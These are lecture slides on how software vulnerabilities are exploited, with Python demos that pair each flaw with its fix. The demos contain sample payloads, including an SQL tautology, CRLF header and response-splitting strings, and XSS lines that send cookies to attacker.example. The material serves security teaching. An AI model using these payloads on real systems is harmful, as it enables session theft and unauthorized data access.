Exploitation Methods

Dr. Jamal A Nasir
Different Methods for Exploiting Vulnerabilities

Vulnerabilities can be exploited by a variety of methods:

◦ SQL injection
◦ buffer overflows
◦ cross-site scripting (XSS) and
◦ open-source exploit kits, which look for known vulnerabilities and security weaknesses in web applications.
SQL injection
• SQL injection is a code injection technique in which attacker-supplied input changes the meaning of a SQL statement; a successful attack can read, alter or destroy your database.

• SQL injection is one of the most common web hacking techniques.

• SQL injection is the placement of malicious SQL code in SQL statements via web page input (form fields, URL parameters, cookies or headers that the application copies into a query).
SQL injection…
A successful SQL injection attack can result in unauthorized
access to sensitive data, such as:
• Passwords.
• Credit card details.
• Personal user information.
SQL injection…
SQL injection usually occurs when you ask a user for input, like their
username/userid

- instead of a name/id, the user gives you a fragment of SQL that you
will unknowingly run on your database.
Example:
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
If the user submits 105 OR 1=1 instead of a number, the statement becomes SELECT * FROM Users WHERE UserId = 105 OR 1=1; the condition is true for every row, so the whole Users table is returned. The defence is to pass the value as a bound parameter (a prepared statement) instead of concatenating it into the SQL text.
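The concatenation above, carried through in runnable form so the effect of the OR 1=1 input can be seen. This is an added example, not code from the lecture; it uses Python's built-in sqlite3 module with a constructed in-memory Users table (the column names, user names and passwords are made up for the demonstration), and shows the same lookup done with a bound parameter.

```python
import sqlite3


def make_db():
    """Constructed sample database: three users with hypothetical passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER PRIMARY KEY, Name TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [(105, "alice", "s3cret"), (106, "bob", "hunter2"), (107, "carol", "pa55w0rd")],
    )
    return conn


def lookup_unsafe(conn, txt_user_id):
    """The slide's pattern: the request string is pasted into the SQL text,
    so whatever the user typed is parsed as SQL."""
    txt_sql = "SELECT * FROM Users WHERE UserId = " + txt_user_id
    return conn.execute(txt_sql).fetchall()


def lookup_safe(conn, txt_user_id):
    """Same query with a bound parameter: the statement text is fixed and the
    value travels separately, so the database never parses it as SQL."""
    return conn.execute("SELECT * FROM Users WHERE UserId = ?", (txt_user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    normal = "105"
    payload = "105 OR 1=1"  # constructed attacker input
    print("unsafe, normal input :", lookup_unsafe(db, normal))
    print("unsafe, payload      :", lookup_unsafe(db, payload))  # every row, passwords included
    print("safe,   payload      :", lookup_safe(db, payload))    # no row has UserId '105 OR 1=1'
    print("safe,   normal input :", lookup_safe(db, normal))
```

Appending OR 1=1 turns the WHERE clause into a tautology, so lookup_unsafe returns all three rows with their passwords, while lookup_safe compares UserId against the literal string and returns nothing. Bound parameters do not make the input trustworthy for other purposes (type, length and business rules still need checking), but they close the injection channel.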
Buffer Overflow
Buffers are memory storage regions that temporarily hold data while it is being
transferred from one location to another.
A buffer overflow attack is a common cyber attack that

◦ deliberately exploits a buffer overflow vulnerability, where user-controlled
data is written to memory without checking that it fits.

◦ By submitting more data than the allocated memory block can hold, the attacker can
overwrite the data stored next to it (other variables, heap bookkeeping data or a saved
return address) and so change what the program does.
Buffer Overflow…
A buffer overflow, also known as a buffer overrun, occurs when
the amount of data written to the buffer exceeds its storage capacity.

That extra data overflows into adjacent memory locations and corrupts or
overwrites the data in those locations.
Cross-site scripting (XSS)
• Cross-site scripting (XSS) occurs when an attacker gets malicious
JavaScript to execute within a victim's browser, because the application
places untrusted input into a page without encoding it for the context in which it appears.

• XSS is a client-side vulnerability that targets other application
users, while SQL injection is a server-side vulnerability that
targets the application's database.
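The point that XSS comes from unencoded output, shown as an added example that is not part of the lecture. The page template, the attacker payloads and the link field are constructed for the demonstration; it uses only Python's html and urllib.parse modules. It goes one step beyond the slide: entity encoding fixes the body context, but a URL attribute also needs a scheme check, because html.escape leaves a javascript: link untouched.

```python
import html
from urllib.parse import urlsplit

# Constructed page template: a greeting plus a "home page" link taken from the user's profile.
PAGE = '<p>Hello, {name}!</p><a href="{home}">home page</a>'

# Constructed attacker inputs: one for the body context, one for the href attribute.
PAYLOAD_NAME = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
PAYLOAD_HOME = "javascript:fetch('https://attacker.example/?c=' + document.cookie)"


def render_unsafe(name, home):
    """Raw interpolation: markup or a javascript: URL in the input becomes part of the page."""
    return PAGE.format(name=name, home=home)


def safe_href(url):
    """Attribute context needs more than entity encoding: html.escape leaves
    'javascript:' untouched, so restrict the scheme before encoding."""
    url = url.strip()
    if urlsplit(url).scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_safe(name, home):
    """Encode for the HTML body context (name) and validate plus encode for the
    href attribute context (home)."""
    return PAGE.format(name=html.escape(name, quote=True), home=safe_href(home))


def executes_script(page):
    """Crude oracle for the demo: does the page still contain an executable
    <script> tag or a javascript: link?"""
    low = page.lower()
    return "<script" in low or 'href="javascript:' in low


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD_NAME, PAYLOAD_HOME))   # script tag and javascript: link survive
    print(render_safe(PAYLOAD_NAME, PAYLOAD_HOME))     # &lt;script&gt; text and href="#"
```

The encoded page still shows the visitor their own text, but as text: the browser renders &lt;script&gt; as the characters "<script>" and never creates an element from it.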
Open-source exploit kits
An exploit kit or exploit pack is a type of toolkit:

◦ cybercriminals use to attack vulnerabilities in systems so they can
distribute malware or

◦ perform other malicious activities
Categories of Vulnerabilities
Vulnerabilities can be classified into six broad categories:
1. Hardware
2. Software
3. Network
4. Personnel
5. Physical Site
6. Organizational
1. Hardware
Any susceptibility to
➢ humidity
➢ dust
➢ soiling
➢ natural disaster
Hardware…
➢ Poor encryption
• Poor encryption may use keys that are too short, too simple, or too
predictable, making them easier to crack.

• Cryptanalysis attacks exploit the flaws or weaknesses of the encryption
algorithm to break it.

• Poor encryption may use algorithms that have been proven to be insecure,
outdated, or compromised.
➢ Firmware vulnerability
• Firmware refers to the software embedded in hardware devices that provides
instructions for their operation.

• Vulnerabilities occur when flaws or weaknesses are present in the
firmware's code, which allows attackers to exploit them for malicious
purposes.
2. Software
• Insufficient testing
• Inadequate testing before deployment can leave code with hidden security issues that
are only found later, sometimes by an attacker.

• Lack of audit trail
(An audit trail is a series of records of computer events, about an operating
system, an application, or user activities; without one, an intrusion cannot be
detected or reconstructed.)

• Design flaws (a design-related product property that
leads to reduced product quality, here reduced security)
2. Software…
• Memory safety violations (buffer overflows, over-reads,
dangling pointers)
• Memory safety is the state of being protected from various software bugs and security
vulnerabilities when dealing with memory access, such as buffer overflows and dangling
pointers.
2. Software…
• For example, Java is said to be memory-safe because its runtime checks
array bounds and rejects null references with an exception instead of touching memory
outside an object.

• In contrast, C and C++ allow arbitrary pointer arithmetic with pointers implemented as
direct memory addresses with no provision for bounds checking, and thus are
potentially memory-unsafe.

Buffer over-read: an anomaly where a program, while reading data from
a buffer, overruns the buffer's boundary and reads (or tries to read) adjacent
memory, which can disclose secrets such as keys or passwords stored nearby.
2. Software…
• Input validation errors (code injection, cross-site
scripting (XSS))
• Input validation errors occur when websites fail to properly validate user
input, leaving them vulnerable to various attacks such as
• SQL injection
• Cross-site scripting (XSS) and
• Command injection

making them a significant threat to web security.
2. Software…
• Email injection
• Email injection is a vulnerability that lets a malicious hacker abuse email-related
functionality, such as email contact forms on web pages, to send malicious email content
to arbitrary recipients.

• Because email injection is based on injecting end-of-line characters (carriage return
and line feed) into header fields, it is sometimes considered a type of CRLF injection attack.

• Email injection is also called email header injection, SMTP header injection, or mail
command injection.
2. Software…
Dangling pointer: a pointer that does not point to a valid object of the appropriate
type, typically because the object it pointed to has been freed. These are special cases of
memory safety violations. More generally, dangling references and wild references are
references that do not resolve to a valid destination.
2. Software…
• Format string attacks
• A format string exploit occurs when attacker-submitted input is
interpreted as a format string by the application, so conversion specifiers in the
input (such as %x or %n) are acted on.

• A format string vulnerability is a type of software bug in which user input is
utilized as the format argument for functions like printf, scanf, or others
within the same family; it can leak stack contents or, via %n, write to memory.
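The same bug in a memory-safe language, as an added example that is not from the lecture: Python's str.format plays the role of printf. When the visitor's text is used as the format string, the {...} fields inside it are evaluated, and an attribute chain can walk from the object passed in to module globals, much as %x walks up the stack. The User class, its api_key field and the module-level SERVER_SECRET are all constructed for the demonstration.

```python
import string

SERVER_SECRET = "constructed-module-level-secret"  # hypothetical secret living in module globals


class User:
    """Constructed sample object; api_key stands in for any field the
    template must never reach (a hypothetical secret)."""

    def __init__(self, name, api_key):
        self.name = name
        self.api_key = api_key


def greet_unsafe(template, user):
    """Python analogue of printf(user_input): the visitor's text is the
    format string, so attribute and index lookups inside {...} are executed."""
    return template.format(user=user)


class RestrictedFormatter(string.Formatter):
    """Only the fields named in ALLOWED may be referenced; anything else
    (user.api_key, user.__init__.__globals__, ...) is refused before lookup."""

    ALLOWED = {"user.name"}

    def get_field(self, field_name, args, kwargs):
        if field_name not in self.ALLOWED:
            raise ValueError("field not allowed in template: " + field_name)
        return super().get_field(field_name, args, kwargs)


def greet_safe(template, user):
    """User-chosen template, but with the reachable fields allow-listed."""
    return RestrictedFormatter().format(template, user=user)


def template_allowed(template, user):
    """True if greet_safe accepts the template, False if it refuses it."""
    try:
        greet_safe(template, user)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    u = User("alice", "AKIA-constructed-secret")
    print(greet_unsafe("Welcome back, {user.name}!", u))
    print(greet_unsafe("Welcome back, {user.api_key}!", u))                  # leaks the field
    print(greet_unsafe("{user.__init__.__globals__[SERVER_SECRET]}", u))     # leaks a global
    print(greet_safe("Welcome back, {user.name}!", u))
    print(template_allowed("{user.__init__.__globals__[SERVER_SECRET]}", u))
```

If a user-chosen template is not a real requirement, the simpler fix is the same as in C: keep the format string a constant written by the developer and pass the user's text only as an argument.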
2. Software…
• HTTP header injection
• The HTTP header injection vulnerability is a web application security term
that refers to a situation when the attacker tricks the web application into
inserting extra HTTP headers into legitimate HTTP responses.

• HTTP header injection is a technique that can be used to facilitate malicious
attacks such as cross-site scripting, web cache poisoning, and more.

• These, in turn, may lead to information disclosure, use of your application in
phishing attacks, and other severe consequences.
Phishing

Phishing is a type of cyberattack that uses fraudulent emails, text
messages, phone calls or websites to trick people into sharing
sensitive data.
Web cache poisoning?
Web cache poisoning is an advanced technique whereby:

◦ an attacker exploits the behavior of a web server and cache so that a
harmful HTTP response is served to other users.
HTTP response splitting

HTTP response splitting is a form of web application vulnerability:

◦ resulting from the failure of the application or
◦ its environment to properly sanitize input values, in particular carriage-return and
line-feed characters that end up in a response header; the attacker can then terminate the
header block and supply a complete second response of their own.
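Email header injection (above, under "Email injection") and HTTP header injection / response splitting are the same mechanism applied to two protocols, so one added example serves both; it is not code from the lecture. The contact-form mailer, the redirect handler and the two attacker inputs are constructed for the demonstration, and the only library used is Python's standard email parser, which reads the built message the way a mail server would.

```python
import email

CR_LF = ("\r", "\n")


def has_crlf(value):
    """True if a value contains a line break: the one thing a header value
    taken from user input must never contain."""
    return any(ch in value for ch in CR_LF)


# --- email header injection ---------------------------------------------

def build_mail_unsafe(to_addr, subject, body):
    """Contact-form mailer that pastes the visitor's fields straight into the
    header block, as the vulnerable forms described on the slide do."""
    return (f"From: webform@example.com\r\n"
            f"To: {to_addr}\r\n"
            f"Subject: {subject}\r\n"
            f"\r\n{body}\r\n")


def build_mail_safe(to_addr, subject, body):
    """Same mailer, but a line break in a header field is refused outright."""
    for field in (to_addr, subject):
        if has_crlf(field):
            raise ValueError("line break in mail header field")
    return build_mail_unsafe(to_addr, subject, body)


def mail_headers(raw):
    """Parse the message as a mail server would and return its headers."""
    return dict(email.message_from_string(raw).items())


# --- HTTP header injection / response splitting ---------------------------

def redirect_unsafe(target):
    """Raw text of a 302 whose Location comes straight from a query parameter."""
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\nContent-Length: 0\r\n\r\n"


def redirect_safe(target):
    if has_crlf(target):
        raise ValueError("line break in HTTP header value")
    return redirect_unsafe(target)


def status_lines(raw):
    """Status line of every response in the stream: a client or proxy sees a
    new response wherever a blank line is followed by 'HTTP/'."""
    return [seg.split("\r\n", 1)[0] for seg in raw.split("\r\n\r\n") if seg.startswith("HTTP/")]


# Constructed attacker inputs: an extra Bcc header, and a whole second response.
MAIL_PAYLOAD = "victim@example.com\r\nBcc: everyone@example.net"
HTTP_PAYLOAD = ("/home\r\nContent-Length: 0\r\n\r\n"
                "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 20\r\n\r\n"
                "<script>x()</script>")

if __name__ == "__main__":
    print(mail_headers(build_mail_unsafe(MAIL_PAYLOAD, "hi", "body")))   # a Bcc header appears
    print(status_lines(redirect_unsafe(HTTP_PAYLOAD)))                   # two responses
    for desc, call in (("mail", lambda: build_mail_safe(MAIL_PAYLOAD, "hi", "body")),
                       ("http", lambda: redirect_safe(HTTP_PAYLOAD))):
        try:
            call()
        except ValueError as exc:
            print(desc, "rejected:", exc)
```

The injected second response is what makes web cache poisoning possible: a cache sitting in front of the server may store that attacker-written 200 OK under the next URL it was about to fetch. Rejecting CR and LF (or using a mail or HTTP library that refuses them in header values) closes both variants at once.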
2. Software…
• Privilege-confusion bugs:
• bugs that enable the attacker to gain more access than they should be allowed, typically
by making a trusted party (the user's browser, or a server) act on the attacker's behalf.

• For example:
• clickjacking, cross-site request forgery, FTP bounce attack
Clickjacking
Clickjacking is an attack that tricks users into thinking they are clicking on one thing when in fact
they are clicking on something else: a webpage element which is invisible or disguised as another element.
This can cause users to innocently download malware, visit malicious web pages, provide
credentials or sensitive information, transfer money, or purchase products online.
Typically, clickjacking is performed by displaying an invisible page or HTML element, inside an
iframe, on top of the page the user sees.
Cross-site request forgery
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute
unwanted actions on a web application in which they're currently authenticated.

A Cross-Site Request Forgery (CSRF) attack occurs when a malicious web site,
email, blog, instant message, or program tricks an authenticated user's web
browser into performing an unwanted action on a trusted site. The browser attaches the
user's cookies to the forged request automatically, so the trusted site cannot tell it from a
genuine one unless it demands something the attacker cannot supply.
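The usual answer to "something the attacker cannot supply" is a synchronizer token, shown here as an added example that is not from the lecture. The endpoint, session ids, form fields and server key are constructed for the demonstration; only Python's hmac, hashlib, secrets and time modules are used. The token is bound to the session, so a token the attacker mints in their own session is rejected when replayed against the victim's.

```python
import hashlib
import hmac
import secrets
import time

# Hypothetical server-side key; in a real deployment it is loaded from configuration.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id, now=None):
    """Synchronizer token: nonce.timestamp.HMAC(session_id|nonce|timestamp).
    The HMAC binds it to one session and makes it unforgeable without the key."""
    ts = str(int(time.time() if now is None else now))
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}|{nonce}|{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{ts}.{mac}"


def verify_csrf_token(session_id, token, max_age=3600, now=None):
    """True only for a well-formed, unexpired token minted for this session."""
    try:
        nonce, ts, mac = token.split(".")
        issued = int(ts)
    except ValueError:
        return False
    expected = hmac.new(SERVER_KEY, f"{session_id}|{nonce}|{ts}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):   # constant-time comparison
        return False
    current = time.time() if now is None else now
    return 0 <= current - issued <= max_age


def handle_transfer(session_id, form, fetch_site=None, now=None):
    """The state-changing endpoint. The browser sends the session cookie on a
    forged request too; what the forging page cannot supply is a valid token
    for this session. Sec-Fetch-Site, where the browser sends it, is a second check."""
    if fetch_site == "cross-site":
        return "rejected: cross-site request"
    if not verify_csrf_token(session_id, form.get("csrf_token", ""), now=now):
        return "rejected: missing or invalid CSRF token"
    return f"transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    victim, attacker = "sess-victim", "sess-attacker"   # constructed session ids
    genuine = {"to": "bob", "amount": "50", "csrf_token": issue_csrf_token(victim)}
    forged = {"to": "attacker", "amount": "5000"}         # hidden auto-submitting form on evil.example
    replayed = {"to": "attacker", "amount": "5000", "csrf_token": issue_csrf_token(attacker)}
    print(handle_transfer(victim, genuine))
    print(handle_transfer(victim, forged))
    print(handle_transfer(victim, replayed))
```

The genuine form carries a token the page obtained from the site itself; the forged form from another origin has no way to read that token, and a token the attacker obtained for their own session fails the HMAC check because the victim's session id is part of the signed data.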
FTP bounce attack
An FTP bounce attack is a type of network attack that exploits the File Transfer
Protocol (FTP) to send outbound traffic to a device other than the intended
server: the attacker gives the PORT command an arbitrary IP address and port, and the FTP
server, which often has more network access than the attacker, opens the data connection to
that host on the attacker's behalf.
